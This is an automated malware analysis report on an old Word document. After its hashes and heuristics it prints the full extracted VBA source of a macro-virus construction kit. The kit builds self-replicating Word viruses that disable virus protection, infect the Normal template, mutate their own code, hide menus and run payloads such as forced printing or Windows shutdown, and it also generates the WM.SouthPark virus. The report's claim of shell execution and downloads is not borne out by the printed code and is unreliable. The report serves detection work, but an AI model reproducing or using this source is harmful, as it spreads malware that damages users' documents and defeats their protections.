Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e18c1d7638752ff7…

MALICIOUS

Office (OLE)

Size: 270.0 KB | Created: 2001-05-25 17:47:00 | Authoring application: Microsoft Word 9.0 | First seen: 2012-06-14
MD5: 2ea78fe2621c4919b77b5ea35499f4c5
SHA-1: bc282edd108864ce165436e5fb4e9594058438f7
SHA-256: e18c1d7638752ff736ac0cb3a9cdbd859a95baf859663b9fec4360e3e175cc7c
Risk Score: 176

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample contains legacy WordBasic macro markers and VBA macros, including AutoOpen and Auto_Close functions. The AutoOpen macro displays UserForm1, which in turn can show UserForm2. Comments in the script state that it was created by './System Failure\.', which appears to be a developer or project handle. The presence of AutoOpen together with shell-command execution via VBA indicates malicious intent to execute code, likely to download and run additional malware.

Heuristics (6)

  • VBA macros detected [medium] (4 related findings) OLE_VBA_MACROS
    Document contains VBA macro code.
  • VBA macro-virus self-replication / AV tampering [critical] OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script: Print #1, "Options.VirusProtection = False"
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    AutoOpen macro present.
    Matched line in script: Sub AutoOpen()
  • Auto_Close macro [low] OLE_VBA_AUTOCLOSE
    Auto_Close macro present.
    Matched line in script: Print #1, "Sub AutoClose()"
  • Legacy WordBasic macro-virus markers [high] OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 15283 bytes
SHA-256: 9bab52f24c39530f90eefb9f52124fd29bf1a76c6f07d8f86adf4d9cd5d732c3
Script preview (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{7A945495-4DF9-4EA6-9671-509366677544}{BD993DCB-D8DF-448A-954A-39BA0B4EF7E4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub CommandButton1_Click()
UserForm2.Show
End Sub

Private Sub CommandButton2_Click()
UserForm1.Hide
End Sub


Attribute VB_Name = "MAIN"
Sub AutoOpen()
UserForm1.Show

End Sub



Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{4CBE7859-8AE5-49FC-81F8-13546EC66B9C}{4AFDFC9C-4A2A-469E-8093-31EE13114A1B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
'Kit creato da ./System Failure\.
'Distribute!!
Private Sub Disclaimer_Click()
MsgBox "Questo programma è stato creato solo per scopo educativo" & vbCrLf & _
       "e non mi ritengo responsabile di problemi arrecati a voi ed a altri" & vbCrLf & _
       "./System Failure\.", vbInformation
MsgBox "This program is for educational purpose only." & vbCrLf & _
    "I take no responsabiliy for any damage caused for" & vbCrLf & _
    "the files created whit this program to anything."
End Sub
Private Sub CommandButton1_Click()
On Error GoTo Err
If CheckBox1 And CheckBox2 And CheckBox3 And CheckBox4 And CheckBox5 = True Then
MsgBox "Selezionare una sola Funzione e un solo Metodo", vbOKOnly, "./System Failure\."
GoTo Err
End If
If CheckBox8 = True And CheckBox9 = True Then
MsgBox "Selezionare un solo Metodo", vbOKOnly, "./System Failure\."
GoTo Err
ElseIf CheckBox8 = False And CheckBox9 = False Then
MsgBox "Selezionare un Metodo", vbOKOnly, "./System Failure\."
GoTo Err
End If
If CheckBox8 = True And CheckBox9 = False Or CheckBox8 = False And CheckBox9 = True Then
End If

If CheckBox1 = True Then
Open "c:\x.bas" For Output As #1
Print #1, "Attribute VB_Name = ""SysFail"""
Print #1, "Sub AutoOpen()"
Close #1
End If

If CheckBox2 = True Then
Open "c:\x.bas" For Output As #1
Print #1, "Attribute VB_Name = ""SysFail"""
Print #1, "Sub AutoExec()"
Close #1
End If

If CheckBox3 = True Then
Open "c:\x.bas" For Output As #1
Print #1, "Attribute VB_Name = ""SysFail"""
Print #1, "Sub AutoClose()"
Close #1
End If

If CheckBox4 = True Then
Open "c:\x.bas" For Output As #1
Print #1, "Attribute VB_Name = ""SysFail"""
Print #1, "Sub FileSave()"
Close #1
End If

If CheckBox5 = True Then
Open "c:\x.bas" For Output As #1
Print #1, "Attribute VB_Name = ""SysFail"""
Print #1, "Sub FilePrint()"
Close #1
End If

If CheckBox6 = True And (CheckBox16 Or CheckBox17 Or CheckBox18 Or CheckBox19 Or CheckBox20) = True Then
Open "c:\x.bas" For Append As #1
Print #1, "'This code has been written by ./System Failure\."
Print #1, "'This Virus have been made with SFVCK (SystemFailureVirusConstructionKit"
Print #1, "'This file is for educational purpose only."
Print #1, "'I take no responsabiliy for any damage caused for"
Print #1, "'the files created with this program to anything."
Print #1, "On Error Resume Next"
Print #1, "Options.VirusProtection = False"
Print #1, "Options.SaveNormalPrompt = False"
Print #1, "Application.VBE.ActiveVBProject.VBComponents(""SysFail"").Export ""c:\Defrag.Log"""
Print #1, "For I = 1 To NormalTemplate.VBProject.VBComponents.Count"
Print #1, "If NormalTemplate.VBProject.VBComponents(I).Name = ""SysFail"" Then NormInstall = True"
Print #1, "Next I"
Print #1, "For I = 1 To ActiveDocument.VBProject.VBComponents.Count"
Print #1, "If ActiveDocument.VBProject.VBComponents(I).Name = ""SysFail"" Then ActivInstall = True"
Print #1, "Next I"
Print #1, "If ActivInstall = True And NormInstall = False Then Set Sys = NormalTemplate.VBProject"
Print #1, "If ActivInstall = False And NormInstall = True Then Set Sys = ActiveDocument.VBProject"
Print #1, "Sys.VBComponents.Import (""c:\Defrag.Log"")"
Print #1, "ActiveDocument.SaveAs FileName:=Activedocument.Fullname, FileFormat:=WdFormatDocument"
Print #1, "Call Polymorphic"
Print #1, "Call Msg"
Print #1, "End Sub"
Close #1

ElseIf CheckBox6 = True And (CheckBox16 Or CheckBox17 Or CheckBox18 Or CheckBox19 Or CheckBox20) = False Then
Open "c:\x.bas" For Append As #1
Print #1, "'This code has been written by ./System Failure\."
Print #1, "'This Virus have been made with SFVCK (SystemFailureVirusConstructionKit"
Print #1, "'This file is for educational purpose only."
Print #1, "'I take no responsabiliy for any damage caused for"
Print #1, "'the files created whit this program to anything."
Print #1, "On Error Resume Next"
Print #1, "Options.VirusProtection = False"
Print #1, "Options.SaveNormalPrompt = False"
Print #1, "Application.VBE.ActiveVBProject.VBComponents(""SysFail"").Export ""c:\Defrag.Log"""
Print #1, "For I = 1 To NormalTemplate.VBProject.VBComponents.Count"
Print #1, "If NormalTemplate.VBProject.VBComponents(I).Name = ""SysFail"" Then NormInstall = True"
Print #1, "Next I"
Print #1, "For I = 1 To ActiveDocument.VBProject.VBComponents.Count"
Print #1, "If ActiveDocument.VBProject.VBComponents(I).Name = ""SysFail"" Then ActivInstall = True"
Print #1, "Next I"
Print #1, "If ActivInstall = True And NormInstall = False Then Set Sys = NormalTemplate.VBProject"
Print #1, "If ActivInstall = False And NormInstall = True Then Set Sys = ActiveDocument.VBProject"
Print #1, "Sys.VBComponents.Import (""c:\Defrag.Log"")"
Print #1, "ActiveDocument.SaveAs FileName:=Activedocument.Fullname, FileFormat:=WdFormatDocument"
Print #1, "Call Polymorphic"
Print #1, "End Sub"
Close #1
End If


If CheckBox10 = True And (CheckBox16 Or CheckBox17 Or CheckBox18 Or CheckBox19 Or CheckBox20) = True Then
Open "C:\x.bas" For Append As #1
Print #1, "'This code has been written by ./System Failure\."
Print #1, "'This Virus have been made with SFVCK (SystemFailureVirusConstructionKit"
Print #1, "'This file is for educational purpose only."
Print #1, "'I take no responsabiliy for any damage caused for"
Print #1, "'the files created whit this program to anything."
Print #1, "On error resume next"
Print #1, "Options.VirusProtection = False"
Print #1, "Options.SaveNormalPrompt = False"
Print #1, "iMacroCount = NormalTemplate.VBProject.VBComponents.Count"
Print #1, "For i = 1 To iMacroCount"
Print #1, "If NormalTemplate.VBProject.VBComponents(i).Name = ""SysFail"" Then"
Print #1, "SysFailInstalled = -1"
Print #1, "End If"
Print #1, "Next i"
Print #1, "If Not SysFailInstalled Then"
Print #1, "Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:=""SysFail"", Object:=wdOrganizerObjectProjectItems"
Print #1, "End if"
Print #1, "Call Msg"
Print #1, "End sub"
Close #1

ElseIf CheckBox10 = True And (CheckBox16 Or CheckBox17 Or CheckBox18 Or CheckBox19 Or CheckBox20) = False Then
Open "C:\x.bas" For Append As #1
Print #1, "'This code has been written by ./System Failure\."
Print #1, "'This Virus have been made with SFVCK (SystemFailureVirusConstructionKit"
Print #1, "'This file is for educational purpose only."
Print #1, "'I take no responsabiliy for any damage caused for"
Print #1, "'the files created whit this program to anything."
Print #1, "On error resume next"
Print #1, "Options.VirusProtection = False"
Print #1, "Options.SaveNormalPrompt = False"
Print #1, "iMacroCount = NormalTemplate.VBProject.VBComponents.Count"
Print #1, "For i = 1 To iMacroCount"
Print #1, "If NormalTemplate.VBProject.VBComponents(i).Name = ""SysFail"" Then"
Print #1, "SysFailInstalled = -1"
Print #1, "End If"
Print #1, "Next i"
Print #1, "If Not SysFailInstalled Then"
Print #1, "Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:=""SysFail"", Object:=wdOrganizerObjectProjectItems"
Print #1, "End if"
Print #1, "End sub"
Close #1
End If

If CheckBox8 = True Then
Open "c:\x.bas" For Append As #1
Print #1, "Sub Polymorphic() 'Poly by ./System Failure\."
Print #1, "PoLy1 = Int(Rnd() * 20 + 1)"
Print #1, "For MutATiOn = 1 To PoLy1"
Print #1, "PoLy2 = Application.VBE.ActiveVBProject.VBComponents(""SysFail"").CodeModule.CountOfLines"
Print #1, "PoLy3 = Int(Rnd() * PoLy2 + 1)"
Print #1, "PoLy4 = Int(Rnd() * 40 + 1)"
Print #1, "For PoLy6 = 1 To PoLy4"
Print #1, "PoLy = Int((120 - 100 + 1) * Rnd + 228)"
Print #1, "PoLy5 = PoLy5 + Chr$(PoLy)"
Print #1, "Next PoLy6"
Print #1, "Application.VBE.ActiveVBProject.VBComponents(""SysFail"").CodeModule.InsertLines PoLy3, vbTab & "" & PoLy5"
Print #1, "PoLy5 = """
Print #1, "Next MutATiOn"
Print #1, "End Sub"
Print #1, ""
Close #1
End If

If CheckBox9 = True Then
Open "c:\x.bas" For Append As #1
Print #1, "Function Polymorphic() 'Poly by VicodinES"
Print #1, "a = Application.VBE.ActiveVBProject.VBComponents(""SysFail"").CodeModule.CountOfLines"
Print #1, "With Application.VBE.ActiveVBProject.VBComponents(""SysFail"").CodeModule"
Print #1, "For x = 2 To a Step 2"
Print #1, ".ReplaceLine x, "" & Application.UserInitials & Now & Application.UserName & Application.ActivePrinter & Now"
Print #1, "Next x"
Print #1, "End With"
Print #1, "End Function"
Print #1, ""
Close #1
End If

If CheckBox12 = True Then
    If CheckBox11 = True Then
    Three = TextBox3.Text
    Open "c:\x.bas" For Append Access Write As #1
    Print #1, "Sub ViewVBCode() "
    Print #1, "Assistant.Visible = True"
    Print #1, "With Assistant.NewBallon"
    Print #1, ".Button = msoButtonSetOK"
    Print #1, ".Heading =""./System Failure\."""
    Print #1, ".Text = """ & Three & """"
    Print #1, ".Show"
    Print #1, "End With"
    Print #1, "End Sub"
    Close #1
    End If
    
    If CheckBox14 = True Then
    Open "c:\x.bas" For Append As #1
    Print #1, "Sub ViewVBCode() "
    Print #1, "MsgBox ""This is a macro virus made with SFVCK!!"", vbOKOnly, ""Virus!!"""
    Print #1, "End Sub"
    Close #1
    End If
    
    If CheckBox15 = True Then
    Open "c:\x.bas" For Append As #1
    Print #1, "Sub ViewVBCode() "
    Print #1, "MsgBox ""Error at 3FFH:11DD"", vbOKOnly, ""Microsoft Word"""
    Print #1, "End Sub"
    Close #1
    End If
End If

If CheckBox16 = True Then
    One = TextBox1.Text
    Two = TextBox2.Text
   Open "C:\x.bas" For Append Access Write As #1
   Print #1, "Sub Msg()"
   Print #1, "If Day(Now) = " & Two & "Then"
   Print #1, "Msgbox """ & One & """"
   Print #1, "End if"
   Print #1, "End Sub"
   Close #1
End If

If CheckBox17 = True Then
    Open "C:\x.bas" For Append Access Write As #1
    Print #1, "Sub Msg()"
    Print #1, "ActiveDocument.PrintOut"
    Print #1, "End Sub"
    Close #1
End If

If CheckBox18 = True Then
    Open "C:\x.bas" For Append Access Write As #1
    Print #1, "Sub Msg()"
    Print #1, "Tasks.ExitWindows"
    Print #1, "End Sub"
    Close #1
End If

If CheckBox19 = True Then
    Three = TextBox10
    Four = TextBox11
    Open "C:\x.bas" For Append Access Write As #1
    Print #1, "Sub Msg()"
    Print #1, "If Day(Now) =" & Four & " then"
    Print #1, "Selection.TypeText Text:=" & Three & ""
    Print #1, "End If"
    Print #1, "End Sub"
    Close #1
End If

If CheckBox20 = True Then
    Five = TextBox4
    Six = TextBox5
    Seven = TextBox6
    Eight = TextBox7
    Nine = TextBox8
    Ten = TextBox9
    Eleven = TextBox13
    Twelve = TextBox14
    Open "C:\x.bas" For Append Access Write As #1
    Print #1, "Sub Msg()"
    Print #1, Five
    Print #1, Six
    Print #1, Seven
    Print #1, Eight
    Print #1, Nine
    Print #1, Ten
    Print #1, Eleven
    Print #1, Twelve
    Print #1, "End Sub"
    Close #1
End If


Documents.Add
ActiveDocument.VBProject.VBComponents.Import ("c:\x.bas")
ActiveDocument.SaveAs FileName:="c:\Vir1", FileFormat:=wdFormatDocument
ActiveDocument.Close
MsgBox "Virus Salvato nel Documento c:\vir1.doc", vbInformation, "./System Failure\."
Kill "c:\x.bas"
Err:

End Sub
Private Sub CommandButton5_Click()
MsgBox "Selezionare Un solo Metodo", vbInformation, "./System Failure\."
End Sub


Private Sub CommandButton3_Click()
MsgBox "Selezionare il metodo di infezione Exp-Imp /StringCopy e una delle Funzioni", vbInformation, "./System Failure\."
MsgBox "Selezionare il metodo di Polimorfismo", vbInformation, "./System Failure\."
MsgBox "Selezionare il Payload ", vbInformation, "./System Failure\."
MsgBox "Selezionare il modo (in grassetto) e un solo evento (sottostante il modo) ", vbInformation, "./System Failure\."
MsgBox "Quando le schede sono state compilate creare il virus", vbInformation, "./System Failure\."
End Sub


Private Sub CommandButton4_Click()
ok = MsgBox("Creare una copia di WM.SouthPark?", vbOKCancel, "/.System Failure\.")
If ok = vbOK Then
Open "C:\Southpark.bas" For Output As #1
Print #1, "Attribute VB_Name = ""SouthPark"""
Print #1, "This program is for educational purpose only."
Print #1, "I take no responsabiliy for any damage caused for"
Print #1, "the files created whit this program to anything."
Print #1, "Sub AutoOpen()"
Print #1, "On Error Resume Next"
Print #1, "Options.VirusProtection = False"
Print #1, "Options.SaveNormalPrompt = False"
Print #1, "iMacroCount = NormalTemplate.VBProject.VBComponents.Count"
Print #1, "For i = 1 To iMacroCount"
Print #1, "If NormalTemplate.VBProject.VBComponents(i).Name = ""SouthPark"" Then"
Print #1, "SouthInstalled = -1"
Print #1, "End If"
Print #1, "Next i"
Print #1, "If Not SouthInstalled Then"
Print #1, "Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:=""SouthPark"", Object:=wdOrganizerObjectProjectItems"
Print #1, "End If"
Print #1, "Call Datex"
Print #1, "Call StealthRoutine"
Print #1, "End Sub"
Print #1, "Sub StealthRoutine()"
Print #1, "CommandBars(""Tools"").Controls(""Macro"").Visible = False"
Print #1, "CommandBars(""Tools"").Controls(""Templates and Add-Ins..."").Visible = False"
Print #1, "Options.VirusProtection = False"
Print #1, "Options.SaveNormalPrompt = False"
Print #1, "End Sub"
Print #1, "Sub Datex()"
Print #1, "If Day(Now) = 3 Then"
Print #1, "MsgBox ""Hello!!I 'm STAN! I went from SouthParK!!"", vbInformation, ""./System Failure\."""
Print #1, "End Sub"
Print #1, "Sub ToolsMacro()"
Print #1, "End Sub"
Print #1, "Sub FileTemplate"
Print #1, "End Sub"
Print #1, "' Written by ./System Failure\."
Close #1
End If
Documents.Add
ActiveDocument.VBProject.VBComponents.Import ("C:\Southpark.bas")
ActiveDocument.SaveAs FileName:="c:\Sp", FileFormat:=wdFormatDocument
ActiveDocument.Close
MsgBox "Virus Salvato nel Documento c:\sp.doc", vbInformation, "./System Failure\."
Kill "c:\x.bas"
End Sub

Private Sub MultiPage1_Change()

End Sub